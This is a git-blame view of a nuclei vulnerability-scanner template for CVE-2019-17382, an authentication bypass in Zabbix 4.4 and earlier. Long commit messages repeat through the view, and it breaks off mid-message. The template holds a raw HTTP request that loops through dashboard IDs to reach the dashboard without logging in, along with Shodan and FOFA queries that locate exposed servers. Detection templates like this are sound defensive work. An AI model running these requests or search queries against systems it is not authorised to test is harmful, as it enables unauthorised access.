nuclei-templates/http/cves/2019/CVE-2019-17382.yaml

60 lines
2.3 KiB
YAML
Raw Permalink Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-17382
info:
Dashboard Content Enhancements (#4411) * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2015/CVE-2015-3224.yaml by mp * Enhancement: cves/2015/CVE-2015-7450.yaml by mp * Enhancement: cves/2016/CVE-2016-10134.yaml by mp * Enhancement: cves/2016/CVE-2016-1555.yaml by mp * Enhancement: cves/2016/CVE-2016-2004.yaml by mp * Enhancement: cves/2016/CVE-2016-5649.yaml by mp * Enhancement: cves/2016/CVE-2016-7552.yaml by mp * Enhancement: cves/2017/CVE-2017-1000486.yaml by mp * Enhancement: cves/2017/CVE-2017-11444.yaml by mp * Spacing issues * Added better reference * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-12611.yaml by mp * Enhancement: cves/2017/CVE-2017-12635.yaml by mp * Enhancement: cves/2017/CVE-2017-14135.yaml by mp * Enhancement: cves/2017/CVE-2017-3881.yaml by mp * Enhancement: cves/2017/CVE-2017-7269.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Enhancement: cves/2017/CVE-2017-9791.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Spacing and other minor issues * Update CVE-2015-1427.yaml * Update CVE-2017-12149.yaml * Update CVE-2017-12542.yaml * Update CVE-2017-12635.yaml * Update CVE-2017-14135.yaml * Update CVE-2017-3881.yaml * Update CVE-2017-7269.yaml * Update CVE-2017-8917.yaml * Update CVE-2017-9791.yaml * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-32204.yaml by mp * Enhancement: cnvd/2020/CNVD-2020-68596.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-09650.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-26422.yaml by mp * Enhancement: cnvd/2022/CNVD-2022-03672.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-0127.yaml by mp * Enhancement: cves/2018/CVE-2018-1000226.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-1273.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-14064.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Cleanup and spacing * Remove blank cve-id lines * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17246.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Enhancement: cves/2018/CVE-2018-18925.yaml by mp * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-2894.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7602.yaml by mp * Enhancement: cves/2018/CVE-2018-9161.yaml by mp * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Many title clean-ups for more standardization. Some vendor name clean-up * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Spacing issues * Remove 2 blank newlines * Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs * Enhancement: cves/2018/CVE-2018-9845.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-16920.yaml by mp * Enhancement: cves/2019/CVE-2019-17270.yaml by mp * Enhancement: cves/2019/CVE-2019-17382.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2019/CVE-2019-17506.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11710.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-12800.yaml by mp * Enhancement: cves/2020/CVE-2020-13117.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-13942.yaml by mp * Spacing, syntax error * Spacing, correct this time. * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2020/CVE-2020-29227.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Enhancement: cves/2021/CVE-2021-24762.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Extra newlines and one sp;acing issue * Update CVE-2018-9995.yaml * Update CVE-2019-0230.yaml * Update CVE-2019-16920.yaml * Update CVE-2019-17270.yaml * Update CVE-2019-17382.yaml * Update CVE-2019-17444.yaml * Update CVE-2019-17506.yaml * Update CVE-2020-10148.yaml * Update CVE-2020-11710.yaml * Update CVE-2020-11854.yaml * Update CVE-2020-12800.yaml * Update CVE-2020-13167.yaml * Update CVE-2020-13927.yaml * Update CVE-2020-13942.yaml * Update CVE-2020-15920.yaml * Update CVE-2020-29227.yaml * Update CVE-2021-24499.yaml * Update CVE-2021-24762.yaml Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
2022-05-17 09:11:26 +00:00
name: Zabbix <=4.4 - Authentication Bypass
2021-06-09 12:20:56 +00:00
author: harshbothra_
2020-08-31 18:34:29 +00:00
severity: critical
Dashboard Content Enhancements (#4411) * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2015/CVE-2015-3224.yaml by mp * Enhancement: cves/2015/CVE-2015-7450.yaml by mp * Enhancement: cves/2016/CVE-2016-10134.yaml by mp * Enhancement: cves/2016/CVE-2016-1555.yaml by mp * Enhancement: cves/2016/CVE-2016-2004.yaml by mp * Enhancement: cves/2016/CVE-2016-5649.yaml by mp * Enhancement: cves/2016/CVE-2016-7552.yaml by mp * Enhancement: cves/2017/CVE-2017-1000486.yaml by mp * Enhancement: cves/2017/CVE-2017-11444.yaml by mp * Spacing issues * Added better reference * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-12611.yaml by mp * Enhancement: cves/2017/CVE-2017-12635.yaml by mp * Enhancement: cves/2017/CVE-2017-14135.yaml by mp * Enhancement: cves/2017/CVE-2017-3881.yaml by mp * Enhancement: cves/2017/CVE-2017-7269.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Enhancement: cves/2017/CVE-2017-9791.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Spacing and other minor issues * Update CVE-2015-1427.yaml * Update CVE-2017-12149.yaml * Update CVE-2017-12542.yaml * Update CVE-2017-12635.yaml * Update CVE-2017-14135.yaml * Update CVE-2017-3881.yaml * Update CVE-2017-7269.yaml * Update CVE-2017-8917.yaml * Update CVE-2017-9791.yaml * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-32204.yaml by mp * Enhancement: cnvd/2020/CNVD-2020-68596.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-09650.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-26422.yaml by mp * Enhancement: cnvd/2022/CNVD-2022-03672.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-0127.yaml by mp * Enhancement: cves/2018/CVE-2018-1000226.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-1273.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-14064.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Cleanup and spacing * Remove blank cve-id lines * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17246.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Enhancement: cves/2018/CVE-2018-18925.yaml by mp * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-2894.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7602.yaml by mp * Enhancement: cves/2018/CVE-2018-9161.yaml by mp * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Many title clean-ups for more standardization. Some vendor name clean-up * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Spacing issues * Remove 2 blank newlines * Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs * Enhancement: cves/2018/CVE-2018-9845.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-16920.yaml by mp * Enhancement: cves/2019/CVE-2019-17270.yaml by mp * Enhancement: cves/2019/CVE-2019-17382.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2019/CVE-2019-17506.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11710.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-12800.yaml by mp * Enhancement: cves/2020/CVE-2020-13117.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-13942.yaml by mp * Spacing, syntax error * Spacing, correct this time. * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2020/CVE-2020-29227.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Enhancement: cves/2021/CVE-2021-24762.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Extra newlines and one sp;acing issue * Update CVE-2018-9995.yaml * Update CVE-2019-0230.yaml * Update CVE-2019-16920.yaml * Update CVE-2019-17270.yaml * Update CVE-2019-17382.yaml * Update CVE-2019-17444.yaml * Update CVE-2019-17506.yaml * Update CVE-2020-10148.yaml * Update CVE-2020-11710.yaml * Update CVE-2020-11854.yaml * Update CVE-2020-12800.yaml * Update CVE-2020-13167.yaml * Update CVE-2020-13927.yaml * Update CVE-2020-13942.yaml * Update CVE-2020-15920.yaml * Update CVE-2020-29227.yaml * Update CVE-2021-24499.yaml * Update CVE-2021-24762.yaml Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
2022-05-17 09:11:26 +00:00
description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application.
2023-09-06 12:53:28 +00:00
remediation: |
Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/47467
- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
2023-08-31 11:46:18 +00:00
- https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html
- https://github.com/huimzjty/vulwiki
- https://github.com/merlinepedra25/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2019-17382
cwe-id: CWE-639
epss-score: 0.3552
epss-percentile: 0.97136
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
metadata:
max-request: 100
2023-07-11 19:49:27 +00:00
vendor: zabbix
product: zabbix
shodan-query:
- http.favicon.hash:892542951
- http.title:"zabbix-server"
- cpe:"cpe:2.3:a:zabbix:zabbix"
fofa-query:
- icon_hash=892542951
- app="zabbix-监控系统" && body="saml"
- title="zabbix-server"
2024-05-31 19:23:20 +00:00
google-query: intitle:"zabbix-server"
2024-03-19 15:20:31 +00:00
tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix
http:
- raw:
2021-04-24 03:59:34 +00:00
- |
2021-04-26 14:35:45 +00:00
GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
2021-04-24 03:59:34 +00:00
Host: {{Hostname}}
payloads:
ids: helpers/wordlists/numbers.txt
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
matchers-condition: and
matchers:
Dashboard Content Enhancements (#4411) * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2015/CVE-2015-3224.yaml by mp * Enhancement: cves/2015/CVE-2015-7450.yaml by mp * Enhancement: cves/2016/CVE-2016-10134.yaml by mp * Enhancement: cves/2016/CVE-2016-1555.yaml by mp * Enhancement: cves/2016/CVE-2016-2004.yaml by mp * Enhancement: cves/2016/CVE-2016-5649.yaml by mp * Enhancement: cves/2016/CVE-2016-7552.yaml by mp * Enhancement: cves/2017/CVE-2017-1000486.yaml by mp * Enhancement: 